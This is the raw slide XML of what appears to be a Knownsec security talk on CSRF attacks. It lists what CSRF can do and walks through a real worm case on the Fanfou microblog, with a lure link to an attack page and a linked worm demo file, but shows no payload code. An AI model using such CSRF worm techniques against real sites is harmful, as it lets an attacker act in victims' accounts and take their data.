              <a:ext cx="214" cy="291"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" kern="1200" cap="all" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{756FECDE-144E-49C5-8CAE-9134DC3B1490}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F21B1B95-D17B-45B4-9137-F66F8FAF2335}"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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="10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课程目的">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="图示 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="928662" y="1857364"/>
          <a:ext cx="7215238"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D8EFC8D0-A975-48AC-9A57-069FC6328291}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16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72D123-0D8D-4E22-ADB9-0CB476730FB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57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.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63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme11.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theme" Target="../theme/theme12.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5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.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51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme9.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80CBF71-50FB-46DC-9112-843D233D09DA}"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F1270D4-700F-48B1-A8C3-96B9FF3714B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5" r:id="rId1"/>
    <p:sldLayoutId id="2147484008" r:id="rId2"/>
    <p:sldLayoutId id="2147484009" r:id="rId3"/>
    <p:sldLayoutId id="2147483976" r:id="rId4"/>
    <p:sldLayoutId id="2147483977" r:id="rId5"/>
    <p:sldLayoutId id="2147484010"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43"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DFDBD9DE-AB7F-4D74-9FC3-75835849B3F3}"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72637429-E256-4136-B3F4-621EC9668AB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02" r:id="rId1"/>
    <p:sldLayoutId id="2147484035" r:id="rId2"/>
    <p:sldLayoutId id="2147484036" r:id="rId3"/>
    <p:sldLayoutId id="2147484003" r:id="rId4"/>
    <p:sldLayoutId id="2147484004" r:id="rId5"/>
    <p:sldLayoutId id="2147484037"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1267"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0BF371AF-0A08-4C11-804D-356A30C378B5}"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655B23E4-F4D5-4310-B06D-6F1182E2AB3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05" r:id="rId1"/>
    <p:sldLayoutId id="2147484038" r:id="rId2"/>
    <p:sldLayoutId id="2147484039" r:id="rId3"/>
    <p:sldLayoutId id="2147484006" r:id="rId4"/>
    <p:sldLayoutId id="2147484007" r:id="rId5"/>
    <p:sldLayoutId id="2147484040"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7171"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rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{49F37F23-23F7-4ECF-832D-4357900138F8}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{19701D78-A25B-481E-B34C-F79D2D11C33D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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7470CE1C-CB60-4FB0-9B9C-4AFCB5BF022C}"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D4C7FE4-28C2-42CE-84CE-18028292165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8" r:id="rId1"/>
    <p:sldLayoutId id="2147484011" r:id="rId2"/>
    <p:sldLayoutId id="2147484012" r:id="rId3"/>
    <p:sldLayoutId id="2147483979" r:id="rId4"/>
    <p:sldLayoutId id="2147483980" r:id="rId5"/>
    <p:sldLayoutId id="2147484013"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3075"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3BC4A0E-EA0D-4ABF-BF96-6A7E7337F32E}"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867FDACD-B637-44C9-A26B-50A4D4F760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81" r:id="rId1"/>
    <p:sldLayoutId id="2147484014" r:id="rId2"/>
    <p:sldLayoutId id="2147484015" r:id="rId3"/>
    <p:sldLayoutId id="2147483982" r:id="rId4"/>
    <p:sldLayoutId id="2147483983" r:id="rId5"/>
    <p:sldLayoutId id="2147484016"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4099"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5B209B7E-A937-4E48-8ACA-A974C3E69CA3}"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BB6AD169-D88B-4E0B-9F2C-8A7A0AD5C82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84" r:id="rId1"/>
    <p:sldLayoutId id="2147484017" r:id="rId2"/>
    <p:sldLayoutId id="2147484018" r:id="rId3"/>
    <p:sldLayoutId id="2147483985" r:id="rId4"/>
    <p:sldLayoutId id="2147483986" r:id="rId5"/>
    <p:sldLayoutId id="2147484019"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5123"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B1886B84-F906-4939-A1A1-3C9AC16D622B}"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CFF56B30-5142-4361-A398-6B593978E6B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87" r:id="rId1"/>
    <p:sldLayoutId id="2147484020" r:id="rId2"/>
    <p:sldLayoutId id="2147484021" r:id="rId3"/>
    <p:sldLayoutId id="2147483988" r:id="rId4"/>
    <p:sldLayoutId id="2147483989" r:id="rId5"/>
    <p:sldLayoutId id="2147484022"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6147"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03A6853A-616C-41C4-A0BE-9BE6F140FA1B}"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B0A8139C-5908-4344-9B4A-32C73A9F983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0" r:id="rId1"/>
    <p:sldLayoutId id="2147484023" r:id="rId2"/>
    <p:sldLayoutId id="2147484024" r:id="rId3"/>
    <p:sldLayoutId id="2147483991" r:id="rId4"/>
    <p:sldLayoutId id="2147483992" r:id="rId5"/>
    <p:sldLayoutId id="2147484025"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7171"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49F37F23-23F7-4ECF-832D-4357900138F8}"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19701D78-A25B-481E-B34C-F79D2D11C33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3" r:id="rId1"/>
    <p:sldLayoutId id="2147484026" r:id="rId2"/>
    <p:sldLayoutId id="2147484027" r:id="rId3"/>
    <p:sldLayoutId id="2147483994" r:id="rId4"/>
    <p:sldLayoutId id="2147483995" r:id="rId5"/>
    <p:sldLayoutId id="2147484028"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8195"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0A3FF054-B06E-47EA-89E3-AA6D0CB42A22}"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DD42991A-0ABA-4D90-AAD3-B9A44111BE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6" r:id="rId1"/>
    <p:sldLayoutId id="2147484029" r:id="rId2"/>
    <p:sldLayoutId id="2147484030" r:id="rId3"/>
    <p:sldLayoutId id="2147483997" r:id="rId4"/>
    <p:sldLayoutId id="2147483998" r:id="rId5"/>
    <p:sldLayoutId id="2147484031"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9219" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929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FAA412FB-74F9-443A-BBF3-F4B9631E9BDE}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16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7618F109-9B7E-4988-B3D1-03564F9E54F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9" r:id="rId1"/>
    <p:sldLayoutId id="2147484032" r:id="rId2"/>
    <p:sldLayoutId id="2147484033" r:id="rId3"/>
    <p:sldLayoutId id="2147484000" r:id="rId4"/>
    <p:sldLayoutId id="2147484001" r:id="rId5"/>
    <p:sldLayoutId id="2147484034" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" kern="1200" cap="all" dirty="0">
          <a:ln w="0"/>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
          </a:effectLst>
          <a:latin typeface="+mj-ea"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>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5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58.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64.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34.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34.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70.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="fanfou_csrf_worm.swf"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p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5518150" y="4857750"/>
            <a:ext cx="1625600" cy="1468438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="副标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643438" y="3929063"/>
            <a:ext cx="3357562" cy="1285875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cosine-evilcos@gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Knownsec Team</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286250" y="2214563"/>
            <a:ext cx="4000500" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>苏醒的巨人</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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击能完成这些事：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>删除、修改、新增目标站点上被攻击者的数据；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JSON Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等获取被攻击者的隐私数据；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>作为其它攻击向量的辅助攻击手法；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使被攻击者成为黑客下一步攻击的跳板；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>甚至可以实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>下面是真实世界的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56323" name="Picture 3" descr="D:\KnownSec\fanfou-0.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="2357438"/>
            <a:ext cx="7439025" cy="3495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="735013" y="1714500"/>
            <a:ext cx="5741987" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>被攻击者（下面就是余弦）登录饭否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>www.fanfou.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1714500"/>
            <a:ext cx="7572375" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>余弦看到好友</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>evilcos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的消息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不错的攻击手法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://xeye.us/lab/nice.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>于是好奇点击去看。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57348" name="Picture 3" descr="D:\KnownSec\fanfou-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847725" y="2738438"/>
            <a:ext cx="7439025" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="5572125"/>
            <a:ext cx="4714875" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="31000"/>
            </a:srgbClr>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1714500"/>
            <a:ext cx="7572375" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>余弦的消息“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test~</a:t>
            </a:r>
            <a:r>
